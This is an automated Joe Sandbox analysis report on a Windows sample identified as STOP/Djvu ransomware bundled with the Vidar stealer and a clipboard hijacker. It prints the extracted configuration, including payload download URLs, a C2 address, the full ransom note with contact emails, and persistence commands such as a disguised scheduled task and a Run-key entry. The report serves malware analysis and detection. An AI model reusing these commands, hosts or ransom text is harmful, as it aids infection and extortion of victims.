Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
qJKiVKZdFk.exe

Overview

General Information

Sample name:qJKiVKZdFk.exe
renamed because original name is a hash value
Original sample name:f3ad3e0f90adfd9a28dbeab4bc6196ef.exe
Analysis ID:1431076
MD5:f3ad3e0f90adfd9a28dbeab4bc6196ef
SHA1:5b699f023304e78d905345b254ebc608a4726721
SHA256:62623bddab0911eca4cd33135383761dbcf6f22a480eda9761becf638f1c4546
Tags:exeStop
Infos:

Detection

Clipboard Hijacker, Djvu, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Found ransom note / readme
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Clipboard Hijacker
Yara detected Djvu Ransomware
Yara detected Vidar stealer
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Infects executable files (exe, dll, sys, html)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies existing user documents (likely ransomware behavior)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes a notice file (html or txt) to demand a ransom
Writes many files with high entropy
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • qJKiVKZdFk.exe (PID: 3076 cmdline: "C:\Users\user\Desktop\qJKiVKZdFk.exe" MD5: F3AD3E0F90ADFD9A28DBEAB4BC6196EF)
    • qJKiVKZdFk.exe (PID: 6692 cmdline: "C:\Users\user\Desktop\qJKiVKZdFk.exe" MD5: F3AD3E0F90ADFD9A28DBEAB4BC6196EF)
      • icacls.exe (PID: 4664 cmdline: icacls "C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed" /deny *S-1-1-0:(OI)(CI)(DE,DC) MD5: 2E49585E4E08565F52090B144062F97E)
      • qJKiVKZdFk.exe (PID: 4216 cmdline: "C:\Users\user\Desktop\qJKiVKZdFk.exe" --Admin IsNotAutoStart IsNotTask MD5: F3AD3E0F90ADFD9A28DBEAB4BC6196EF)
        • qJKiVKZdFk.exe (PID: 5784 cmdline: "C:\Users\user\Desktop\qJKiVKZdFk.exe" --Admin IsNotAutoStart IsNotTask MD5: F3AD3E0F90ADFD9A28DBEAB4BC6196EF)
          • build2.exe (PID: 7524 cmdline: "C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exe" MD5: A04031208441077A014F42095FF86107)
            • build2.exe (PID: 7540 cmdline: "C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exe" MD5: A04031208441077A014F42095FF86107)
          • build3.exe (PID: 7684 cmdline: "C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build3.exe" MD5: 41B883A061C95E9B9CB17D4CA50DE770)
            • build3.exe (PID: 8020 cmdline: "C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build3.exe" MD5: 41B883A061C95E9B9CB17D4CA50DE770)
              • schtasks.exe (PID: 8040 cmdline: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe" MD5: 48C2FE20575769DE916F48EF0676A965)
                • conhost.exe (PID: 8052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • qJKiVKZdFk.exe (PID: 2052 cmdline: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe --Task MD5: F3AD3E0F90ADFD9A28DBEAB4BC6196EF)
    • qJKiVKZdFk.exe (PID: 6348 cmdline: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe --Task MD5: F3AD3E0F90ADFD9A28DBEAB4BC6196EF)
  • qJKiVKZdFk.exe (PID: 7636 cmdline: "C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe" --AutoStart MD5: F3AD3E0F90ADFD9A28DBEAB4BC6196EF)
    • qJKiVKZdFk.exe (PID: 7692 cmdline: "C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe" --AutoStart MD5: F3AD3E0F90ADFD9A28DBEAB4BC6196EF)
  • qJKiVKZdFk.exe (PID: 7956 cmdline: "C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe" --AutoStart MD5: F3AD3E0F90ADFD9A28DBEAB4BC6196EF)
    • qJKiVKZdFk.exe (PID: 7972 cmdline: "C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe" --AutoStart MD5: F3AD3E0F90ADFD9A28DBEAB4BC6196EF)
  • mstsca.exe (PID: 8092 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe MD5: 41B883A061C95E9B9CB17D4CA50DE770)
    • mstsca.exe (PID: 3284 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe MD5: 41B883A061C95E9B9CB17D4CA50DE770)
      • schtasks.exe (PID: 6912 cmdline: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe" MD5: 48C2FE20575769DE916F48EF0676A965)
        • conhost.exe (PID: 644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • qJKiVKZdFk.exe (PID: 8100 cmdline: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe --Task MD5: F3AD3E0F90ADFD9A28DBEAB4BC6196EF)
    • qJKiVKZdFk.exe (PID: 8128 cmdline: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe --Task MD5: F3AD3E0F90ADFD9A28DBEAB4BC6196EF)
  • qJKiVKZdFk.exe (PID: 2196 cmdline: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe --Task MD5: F3AD3E0F90ADFD9A28DBEAB4BC6196EF)
    • qJKiVKZdFk.exe (PID: 5528 cmdline: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe --Task MD5: F3AD3E0F90ADFD9A28DBEAB4BC6196EF)
  • mstsca.exe (PID: 7780 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe MD5: 41B883A061C95E9B9CB17D4CA50DE770)
    • mstsca.exe (PID: 1268 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe MD5: 41B883A061C95E9B9CB17D4CA50DE770)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
STOP, DjvuSTOP Djvu Ransomware it is a ransomware which encrypts user data through AES-256 and adds one of the dozen available extensions as marker to the encrypted file's name. It is not used to encrypt the entire file but only the first 5 MB. In its original version it was able to run offline and, in that case, it used a hard-coded key which could be extracted to decrypt files.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stop
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199673019888"]}

Threatname: Djvu

{"Download URLs": ["http://sdfjhuz.com/dl/build2.exe", "http://cajgtus.com/files/1/build3.exe"], "C2 url": "http://cajgtus.com/test1/get.php", "Ransom note file": "_README.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nDo not ask assistants from youtube and recovery data sites for help in recovering your data.\r\nThey can use your free decryption quota and scam you.\r\nOur contact is emails in this text document only.\r\nYou can get and look video overview decrypt tool:\r\nhttps://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27\r\nPrice of private key and decrypt software is $999.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $499.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshingmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelpyou@airmail.cc\r\n\r\nYour personal ID:\r\n0863PsawqS", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Windows\\", "F:\\PerfLogs\\", "F:\\ProgramData\\Desktop\\", "F:\\ProgramData\\Microsoft\\", "F:\\Users\\Public\\", "F:\\$Recycle.Bin\\", "F:\\$WINDOWS.~BT\\", "F:\\dell\\", "F:\\Intel\\"], "Public Key": "-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw0Ftq9GtunuzQZHGiqoG\\\\n8S4cMO\\/Bdgsd+jTtFbVs1bX4OXiYKnMXg4LclKMEHJ2gnP2X09BkzA29UJQlagak\\\\nuAL7j7iRagKeU4tAB8w9rziBYoa9zROqer7J6pf5B11vAvvRq4b3127kAxnMhpgo\\\\ns7MQC7pXIvTkEeGySeG+F5fjSMPUoF1\\/cAg6GuSWOPXoPvXKRA\\/mo+xyHVOKZe2+\\\\nSCpbMHAyMe7o4w\\/i\\/pVjv9g8pRDJtz14qtMuAR38ek+SPJ4PJCxA9e0tOi+p4yNn\\\\nvnFKoL5OwzoF+bvVHnTA7tk4fXB3AyaL9llS0kxEWS7x\\/kNYQyJPh9fimryM03Cy\\\\n1wIDAQAB\\\\n-----END PUBLIC KEY-----"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000016.00000002.1457933535.00000000009AD000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x74d4:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000012.00000002.1332847113.0000000003540000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
    00000019.00000002.1459503770.0000000005E00000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
      00000019.00000002.1459503770.0000000005E00000.00000040.00001000.00020000.00000000.sdmpWindows_Ransomware_Stop_1e8d48ffunknownunknown
      • 0x105ac8:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
      • 0xe38f:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
      00000027.00000002.1939278808.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
        Click to see the 66 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        40.2.mstsca.exe.8915a0.1.raw.unpackJoeSecurity_Clipboard_HijackerYara detected Clipboard HijackerJoe Security
          40.2.mstsca.exe.8915a0.1.raw.unpackWindows_Trojan_Clipbanker_f9f9e79dunknownunknown
          • 0x1203:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
          40.2.mstsca.exe.8915a0.1.raw.unpackWindows_Trojan_Clipbanker_787b130bunknownunknown
          • 0xefa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00
          • 0xf87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A
          • 0xf87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A
          • 0x12ad:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ...
          • 0x1335:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
          22.2.build3.exe.9815a0.1.raw.unpackJoeSecurity_Clipboard_HijackerYara detected Clipboard HijackerJoe Security
            22.2.build3.exe.9815a0.1.raw.unpackWindows_Trojan_Clipbanker_f9f9e79dunknownunknown
            • 0x1203:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
            Click to see the 110 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: CurrentVersion Autorun Keys Modification
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe" --AutoStart, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\qJKiVKZdFk.exe, ProcessId: 6692, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper
            Sigma detected: Suspicious Add Scheduled Task Parent
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe", CommandLine: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build3.exe" , ParentImage: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build3.exe, ParentProcessId: 8020, ParentProcessName: build3.exe, ProcessCommandLine: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe", ProcessId: 8040, ProcessName: schtasks.exe
            Sigma detected: Suspicious Schtasks From Env Var Folder
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe", CommandLine: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build3.exe" , ParentImage: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build3.exe, ParentProcessId: 8020, ParentProcessName: build3.exe, ProcessCommandLine: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe", ProcessId: 8040, ProcessName: schtasks.exe

            Snort Signatures

            Timestamp:04/24/24-14:42:14.071401
            SID:2036333
            Source Port:49705
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:04/24/24-14:42:10.980226
            SID:2036333
            Source Port:49702
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:04/24/24-14:42:10.980226
            SID:2020826
            Source Port:49702
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:04/24/24-14:42:11.004642
            SID:2833438
            Source Port:49704
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:04/24/24-14:42:14.071401
            SID:2020826
            Source Port:49705
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:04/24/24-14:42:11.787679
            SID:2036335
            Source Port:80
            Destination Port:49703
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:04/24/24-14:42:11.756826
            SID:2036335
            Source Port:80
            Destination Port:49704
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: qJKiVKZdFk.exeAvira: detected
            Antivirus detection for URL or domain
            Source: http://sdfjhuz.com/dl/build2.exeKfAvira URL Cloud: Label: malware
            Source: http://sdfjhuz.com/dl/build2.exerun421fAvira URL Cloud: Label: malware
            Source: http://sdfjhuz.com/dl/build2.exe$runAvira URL Cloud: Label: malware
            Source: http://sdfjhuz.com/dl/build2.exeAvira URL Cloud: Label: malware
            Source: http://cajgtus.com/files/1/build3.exeAvira URL Cloud: Label: malware
            Antivirus detection for dropped file
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\build2[1].exeAvira: detection malicious, Label: HEUR/AGEN.1313019
            Found malware configuration
            Source: 00000012.00000002.1332847113.0000000003540000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199673019888"]}
            Source: 00000019.00000002.1459503770.0000000005E00000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Djvu {"Download URLs": ["http://sdfjhuz.com/dl/build2.exe", "http://cajgtus.com/files/1/build3.exe"], "C2 url": "http://cajgtus.com/test1/get.php", "Ransom note file": "_README.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nDo not ask assistants from youtube and recovery data sites for help in recovering your data.\r\nThey can use your free decryption quota and scam you.\r\nOur contact is emails in this text document only.\r\nYou can get and look video overview decrypt tool:\r\nhttps://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27\r\nPrice of private key and decrypt software is $999.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $499.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshingmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelpyou@airmail.cc\r\n\r\nYour personal ID:\r\n0863PsawqS", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\build2[1].exeReversingLabs: Detection: 73%
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeReversingLabs: Detection: 44%
            Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeReversingLabs: Detection: 86%
            Multi AV Scanner detection for submitted file
            Source: qJKiVKZdFk.exeReversingLabs: Detection: 44%
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\build2[1].exeJoe Sandbox ML: detected
            Machine Learning detection for sample
            Source: qJKiVKZdFk.exeJoe Sandbox ML: detected
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_0040E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,2_2_0040E870
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_0040EA51 CryptDestroyHash,CryptReleaseContext,2_2_0040EA51
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_0040EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,2_2_0040EAA0
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_0040EC68 CryptDestroyHash,CryptReleaseContext,2_2_0040EC68
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_00410FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,2_2_00410FC0
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_00411178 CryptDestroyHash,CryptReleaseContext,2_2_00411178
            Source: qJKiVKZdFk.exe, 00000006.00000003.1928900670.0000000000902000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_4605c8a5-f

            Compliance

            barindex
            Detected unpacking (overwrites its own PE header)
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeUnpacked PE file: 2.2.qJKiVKZdFk.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeUnpacked PE file: 19.2.build2.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeUnpacked PE file: 23.2.qJKiVKZdFk.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeUnpacked PE file: 26.2.qJKiVKZdFk.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build3.exeUnpacked PE file: 27.2.build3.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeUnpacked PE file: 32.2.qJKiVKZdFk.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeUnpacked PE file: 33.2.mstsca.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeUnpacked PE file: 39.2.qJKiVKZdFk.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeUnpacked PE file: 41.2.mstsca.exe.400000.0.unpack
